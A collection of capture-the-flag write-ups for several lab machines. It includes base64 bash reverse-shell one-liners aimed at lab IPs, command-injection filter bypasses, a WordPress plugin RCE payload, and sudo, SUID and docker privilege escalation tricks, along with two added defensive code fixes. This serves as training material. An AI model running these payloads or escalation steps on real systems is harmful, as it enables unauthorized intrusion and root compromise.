echo *

BTRSys2.1

Ports 21, 22 and 80 are open, and FTP allows anonymous login, but after logging in there is nothing there and nothing can be uploaded. wpscan turned up users including admin, and trying the weak password admin/admin logged in successfully. Looking at the plugins, one of them had a working LFI, and reading /etc/passwd succeeded, but every method I tried for reading logs failed, so in the end I just uploaded a PHP reverse shell.


For privilege escalation, after trying the usual Linux tricks without success,
cat wp-config.php gave the MySQL username and password.

Run mysql:

mysql -u root -h localhost -p

show databases;

use wordpress;

show tables;

SELECT * FROM wp_users LIMIT 5;


Seeing the root hash, rather than bothering to crack it myself I put it straight into CrackStation, which gave the root password roottoor.

NoName

At first I scanned only the top 20 ports, and only port 22 was open; opening the web page:


There was nothing there at all, so I did a full port scan and web directory enumeration;
still only port 80 open, and found superadmin.php.

┌──(kali㉿LAPTOP-FKRJU4AD)-[~]
└─$ gobuster dir -u  http://192.168.157.15/ -w /usr/share/wordlists/dirb/big.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.157.15/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/admin                (Status: 200) [Size: 417]
/index.php            (Status: 200) [Size: 201]
/server-status        (Status: 403) [Size: 279]
/superadmin.php       (Status: 200) [Size: 152]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================

The page is an obvious command injection; after a few attempts, |l\s executed successfully.


Using |ca\t su* here shows the page's actual restrictions:

<?php
if (isset($_POST['submitt']))
{
    // Token blacklist: each entry is stripped from the input in turn
    $word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
    $pinged=$_POST['pinger'];
    $newStr = str_replace($word, "", $pinged);
    // Input is accepted only if stripping changed nothing, i.e. it contained none of the tokens
    if(strcmp($pinged, $newStr) == 0)
    {
        $flag=1;
    }
    else
    {
        $flag=0;
    }
}

if ($flag==1){
    // The raw input is interpolated into the shell command string
    $outer=shell_exec("ping -c 3 $pinged");
    echo "<pre>$outer</pre>";
}
?>
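The allowlist check missing from the handler above, added here as an example (not code from the page or the machine): the blacklist only strips the tokens it lists, so an input built from other characters, such as the page's |l\s, reaches shell_exec untouched. It is written as a POSIX shell function so it can be run on its own; in the PHP itself the equivalent is filter_var with FILTER_VALIDATE_IP or a hostname check, followed by escapeshellarg.

```shell
#!/bin/sh
# Added example: allowlist validation for a "ping this host" form, the check the
# pinger handler on this page lacks. Its blacklist strips tokens and pings whatever
# survives, so input built from characters it never lists (| and \ in the page's
# "|l\s") goes straight into shell_exec.

# Accept only a dotted-quad IPv4 address (octets 0-255) or a hostname made of
# letters, digits, hyphens and dots. Everything else, including every shell
# metacharacter, is rejected before a command is ever built.
is_valid_target() {
    t=$1
    [ -n "$t" ] || return 1
    case "$t" in
        *[!A-Za-z0-9.-]*) return 1 ;;   # space, |, ;, &, \, $, quotes, ...
        -*|.*|*.|*..*)   return 1 ;;   # leading hyphen would be read as a ping option
    esac
    case "$t" in
        *[!0-9.]*) return 0 ;;          # contains a letter: plain hostname, done
    esac
    # All digits and dots: must be exactly four octets, each <= 255
    n=0
    for o in $(printf '%s' "$t" | tr '.' ' '); do
        n=$((n + 1))
        [ "$o" -le 255 ] 2>/dev/null || return 1
    done
    [ "$n" -eq 4 ]
}

# The validated target is passed to ping as one argument after "--"; the input is
# never spliced into a shell string, so there is nothing for it to inject into.
safe_ping() {
    is_valid_target "$1" || { printf 'rejected target: %s\n' "$1" >&2; return 1; }
    ping -c 3 -- "$1"
}
```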

Here |echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xOTQvNDQ0NCAwPiYx" | base64 -d | bash, where the base64 part is sh -i >& /dev/tcp/192.168.45.194/4444 0>&1, successfully gave a reverse shell.


Then, while looking for SUID binaries, I found that find could be abused.

ICMP

Basic port scan: ports 22 and 80 open.
Opening the web page, there was not much to attack, but searching for the version showed an RCE vulnerability.


Privilege escalation was again the hated guessing game; the basic privesc methods I tried all failed. Finally, looking around, I found a strange directory that was execute-only and not readable; reading reminder, it said:

crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?

Guess 1: it is at ./devel/crypt.php

www-data@icmp:/home/fox$ cat ./devel/crypt.php
cat ./devel/crypt.php
<?php
echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da');
?>

Guess 2: this is fox's user password

www-data@icmp:/home/fox$ ls -al
ls -al                                         
total 20                                        
drwxr-xr-x 3 root root 4096 Dec  3  2020 .
drwxr-xr-x 3 root root 4096 Dec  3  2020 ..
lrwxrwxrwx 1 root root    9 Dec  3  2020 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3  2020 devel
-rw-r--r-- 1 fox  fox    33 Aug 19 15:04 local.txt
-rw-r--r-- 1 root root   78 Dec  3  2020 reminder

Then I connected over ssh, looked around, and sudo -l showed hping3, which GTFOBins says can be abused.
Usage as follows:
Open two sessions

$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe

--listen signature -> hping3 listen mode; with this option hping3 waits for packets that contain the signature and dumps from the end of the signature to the end of the packet
$ sudo /hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/proof.txt

--sign signature -> packet identity: adds a signature to the data payload of sent packets. The signature can be any arbitrary string of characters and is included in the packet's data section.
-d -> data size


Loly

Port scan result: port 80 open (only)
Then in the wordpress directory that turned up, wpscan found the user Loly
password fernando


SoSimple

Port scan result: ports 22 and 80 open
Likewise found the wordpress directory and used wpscan


Searching social-warfare showed it has an RCE; I referred to this exploit on GitHub, but my PoC is:

payload.txt

<pre>system('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yNDQvNDQ0NCAwPiYx" | base64 -d | bash')</pre>

Start an http.server on the local machine, then run it through the exploit above:

python2 CVE-2019-9978.py -t http://192.168.168.78/wordpress/ --payload-uri http://192.168.45.244:8000/payload.txt


Then, because the initial wpscan had also found the user max, and the image above also shows a user max, I reasonably suspected the two passwords would be the same; wpscan found the password opensesame.

But logging in over ssh failed; then in max's home directory I found id_rsa, and using it I logged in successfully.

After sudo -l, /usr/sbin/service/ can be run as steven without a password. Once I had steven's shell, sudo -l showed /opt/tools/server-health.sh could be abused; I tried to cat that file, but it did not exist.

So I wrote /bin/bash into server-health.sh myself and ran it with sudo to get root.

DC-4

Basic port scan: ports 22 and 80 open. Poking at the site showed a login page with no sign of SQLi, and brute-forcing the web directories found nothing, so the only option was to brute-force the login; admin/happy logged in successfully.


After logging in there is an obvious command injection page.

Modifying the request got a reverse shell.

radio=echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx" | base64 -d | bash &submit=Run

In user jim's directory there is old-passwords.bak, which contains many passwords; copy it out and try cracking with it.

From that password list and the known users, build two dictionaries and try hydra to see if there is a chance.

After logging in as jim, I tried as hard as possible to escalate, without success; checking mail revealed another user, charles, and his password.

Switching to charles, sudo -l shows /usr/bin/teehee can be used without a password. I guessed this is really tee; checking tee on GTFOBins shows it can write files, so I wrote charles into /etc/sudoers to give him root as well.

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo /usr/bin/teehee -a /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ su root
Password:
su: Authentication failure
charles@dc-4:~$ sudo su
[sudo] password for charles:
root@dc-4:/home/charles# cat /root/proof.txt
e4951b05703a5c6287b20ab096c6c0fe
root@dc-4:/home/charles#


Pwned1

Ports 21, 22 and 80 open. Directory brute-forcing took forever; found /hidden_text, which contains a file secret.dic; opening it reveals more directories, of which only /pwned.vuln is accessible.


In that directory there is an input box; initial testing showed no SQLi.


Capturing the request with Burp Suite, the response contains PHP code.


Unfortunately the credentials written there are not the web login credentials; by guesswork they turned out to be the FTP username & password.
After connecting over FTP there is a share directory containing id_rsa and note.txt; download them and log in with the name mentioned in note.txt, ariana.

┌──(kali㉿G)-[/tmp]
└─$ cat note.txt
Wow you are here

ariana won't happy about this note

sorry ariana :(
┌──(kali㉿G)-[/tmp]
└─$ sudo chmod 600 id_rsa
[sudo] password for kali:

┌──(kali㉿G)-[/tmp]
└─$ ssh -i id_rsa ariana@192.168.171.95
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ariana@pwned:~$ cat local.txt
59cd03d49cee9d05b419e4b56444da35
ariana@pwned:~$

For privilege escalation, sudo -l shows (selena) NOPASSWD: /home/messenger.sh, which can be abused.

ariana@pwned:/home$ cat messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "

$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
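A rewrite of messenger.sh that treats the message as data, added here as an example rather than the machine's script: the original's line $msg 2> /dev/null runs the typed message as a command under the sudo target user, which is the whole privilege escalation. PASSWD_FILE and the spool directory are hypothetical parameters not present in the original.

```shell
#!/bin/sh
# Added example: messenger.sh rewritten so the message is never executed. The
# original's "$msg 2> /dev/null" line evaluates the typed message as a command,
# and with "(selena) NOPASSWD" every caller of the script gets a shell as selena.
# PASSWD_FILE is a hypothetical override so the checks can run on a test copy.
PASSWD_FILE=${PASSWD_FILE:-/etc/passwd}

# A recipient is valid only if it is an existing account with a home under /home,
# looked up in the passwd file instead of trusted from the prompt.
is_local_user() {
    awk -F: -v u="$1" '$1 == u && $6 ~ /^\/home\// { found = 1 } END { exit !found }' "$PASSWD_FILE"
}

# Deliver by appending the text to the recipient's spool file. printf '%s' writes
# the bytes unchanged, so "/bin/bash" or "$(id)" arrives as literal text.
# The spool directory (3rd argument) defaults to a hypothetical /var/spool/messenger.
send_message() {
    name=$1; msg=$2; spool=${3:-/var/spool/messenger}
    is_local_user "$name" || { printf 'no such user: %s\n' "$name" >&2; return 1; }
    printf '%s\n' "$msg" >> "$spool/$name.msg"
}

# Interactive front-end that keeps the original prompts; run with --interactive.
main() {
    echo "Welcome to linux.messenger"
    awk -F: '$6 ~ /^\/home\// { print $1 }' "$PASSWD_FILE"
    printf 'Enter username to send message : '; read -r name
    printf 'Enter message for %s : ' "$name"; read -r msg
    send_message "$name" "$msg" && echo "Message sent to $name :)"
}

if [ "${1:-}" = "--interactive" ]; then main; fi
```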

Note that $msg in this shell script is executed directly; first escalate horizontally to selena.

ariana@pwned:/home$ sudo -u selena ./messenger.sh
Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : asdf

Enter message for asdf :/bin/bash

Sending message to asdf
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
python3 -c 'import pty;pty.spawn("/bin/bash")'
selena@pwned:/home$

After the basic privesc methods failed, repeated inspection showed that docker is among our groups; escalate using GTFOBins.

selena@pwned:/home$ id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
selena@pwned:/home$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# cat /root/proof.txt
5afb73776252b8a2e48a250cc2f172c1
#